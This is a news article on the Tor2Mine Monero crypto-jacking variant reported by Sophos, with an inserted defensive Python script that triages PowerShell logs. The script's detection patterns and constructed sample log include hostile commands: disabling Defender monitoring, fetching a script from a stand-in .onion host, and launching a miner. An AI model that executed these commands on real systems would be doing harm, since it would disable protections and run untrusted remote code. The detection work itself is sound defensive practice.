Security researchers detect new variant of Monero mining exploit Tor2Mine

The industry woke up today to the news of the Bitmart exchange being exploited to the tune of nearly $200 million in stolen funds across Ethereum and Binance Smart Chain. With exploits becoming more common and hackers coming up with ingenious ways to install malware, caution is absolutely necessary.

It is worth noting, however, that mining campaigns give these hackers a low-risk way to earn digital cash by exploiting network vulnerabilities.

Earlier this week, security researchers at Sophos warned of the return of Tor2Mine, a miner variant that uses a Tor gateway to communicate with its hacked servers. It can also leverage whole networks of worker machines.

Stealing processing power

This type of cybercrime is known as crypto-jacking, an act where hackers make unauthorized use of foreign devices to mine cryptocurrencies. By siphoning off the energy sources of those devices while staying completely hidden, these miners can obtain new tokens without incurring energy costs.

Most of these miners, including Tor2Mine, carry out these campaigns against Monero. The altcoin appeals to hackers due to its private and untraceable nature.

Here’s how Tor2Mine works: it uses Microsoft’s PowerShell scripting language to disable pre-existing malware protection on a server and execute a miner payload, a stealthy piece of malware designed to farm the resources of a system. It also harvests Windows credentials, which Tor2Mine uses to spread to and re-infect other systems on the compromised network. If it is not completely eradicated, the other systems remain unprotected.
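The paragraph above describes four observable behaviours (tampering with malware protection, fetching through a Tor gateway, harvesting credentials, and running a miner) and stresses that cleaning one machine is not enough. The script below is an added illustration of how a defender might triage PowerShell activity logs for those behaviours and check whether indicators persist on other hosts after one system was cleaned. It is not code from the article or from Sophos; the log line format, host names, rule patterns and every sample line are constructed for this example and are not real Tor2Mine indicators.

```python
"""Triage of PowerShell activity logs for Tor2Mine-style behaviour.

Added example (not from the article or from Sophos): the log format,
host names, rule names and every sample line below are constructed for
illustration and are not real Tor2Mine indicators.
"""
import re
from datetime import datetime

# One rule per behaviour the article attributes to Tor2Mine: disabling
# malware protection, fetching through a Tor gateway, harvesting Windows
# credentials, and running a miner that talks to a mining pool.
RULES = {
    "defense_tampering": re.compile(
        r"Set-MpPreference\s+-Disable\w+|Stop-Service\s+\S*(Defender|Sense)\b", re.I),
    "tor_gateway": re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.I),
    "credential_harvest": re.compile(r"\blsass\b|\bsekurlsa\b", re.I),
    "miner_payload": re.compile(r"stratum\+tcp://|xmrig", re.I),
}


def parse_line(line):
    """Constructed line format: '<ISO timestamp> <host> <script or command text>'."""
    ts, host, text = line.split(" ", 2)
    return datetime.fromisoformat(ts), host, text


def match_rules(text):
    """Names of every rule whose pattern occurs in one script block."""
    return {name for name, rx in RULES.items() if rx.search(text)}


def triage(lines):
    """Map each host to the set of behaviours seen on it; hosts with no hits are omitted."""
    hits = {}
    for line in lines:
        _, host, text = parse_line(line)
        names = match_rules(text)
        if names:
            hits.setdefault(host, set()).update(names)
    return hits


def still_active_after(lines, cleaned_at):
    """Hosts that show any indicator after the moment one machine was cleaned.

    The article's point is that cleaning a single system does not end the
    campaign: an empty result is the only evidence the network is clear.
    """
    cutoff = datetime.fromisoformat(cleaned_at)
    return sorted({host for when, host, text in map(parse_line, lines)
                   if when > cutoff and match_rules(text)})


# Constructed sample: ws-finance-07 is tampered with and cleaned at 10:00,
# but a host it had already spread to is still mining an hour later.
SAMPLE_LOG = [
    "2021-12-01T09:00:00 ws-finance-07 Set-MpPreference -DisableRealtimeMonitoring $true",
    "2021-12-01T09:00:05 ws-finance-07 Invoke-WebRequest http://abcdefghijklmnop.onion.example/s.ps1",
    "2021-12-01T09:02:00 ws-finance-07 <credential-harvest script referencing lsass.exe>",
    "2021-12-01T09:05:00 ws-finance-07 Start-Process miner.exe -ArgumentList '-o stratum+tcp://pool.example:3333'",
    "2021-12-01T09:30:00 ws-finance-12 Set-MpPreference -DisableRealtimeMonitoring $true",
    "2021-12-01T11:00:00 ws-finance-12 Start-Process miner.exe -ArgumentList '-o stratum+tcp://pool.example:3333'",
    "2021-12-01T11:05:00 ws-finance-12 Get-Date",  # benign line, no hit
]

if __name__ == "__main__":
    for host, names in sorted(triage(SAMPLE_LOG).items()):
        print(host, sorted(names))
    print("still active after cleanup:",
          still_active_after(SAMPLE_LOG, "2021-12-01T10:00:00"))
```

Run against the constructed sample, `triage` attributes all four behaviours to ws-finance-07 and two to ws-finance-12, and `still_active_after` with the 10:00 cleanup time returns ws-finance-12: the machine that was cleaned is no longer the problem, the one it spread to is. In a real deployment the patterns would be replaced by the vendor's published indicators and the input by PowerShell script-block and process-creation events from every host, not just the one that raised the first alert.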

Sophos further noted that while a surge of Tor2Mine infections was seen in early 2021, the subsequent decline has been accompanied by the introduction of new variants. These likely arise from minor tweaks made by different sets of operators, or by the same actors between campaigns.

The anti-virus company also revealed that while two different takes on Tor2Mine have been noted since June, their “underlying game plan is almost always the same.”

That being said, it did conclude,

“Tor2Mine is much more difficult to root out once it’s established a foothold on a network without the assistance of endpoint protection software and other anti-malware measures… it can’t be eliminated just by patching and cleaning one system. The miner will continually attempt to re-infect other systems on the network.”

The only way to escape these miners is by installing anti-malware products that can detect them.

With the spread of cryptocurrency fervor, illegal mining has become an established means of criminally obtaining digital assets. A recent cyber security report by Google revealed that 86% of compromised Google Cloud accounts are used for illegal cryptocurrency mining, as well as for scanning and attacking other potential targets.

Interestingly, a June report by Kaspersky found that crypto-jacking has fallen from its heyday in 2017-18 during the initial crypto-boom. However, the total number of users who encountered miners on their devices increased to 200,045 in March from 187,746 in January in the first quarter of this year.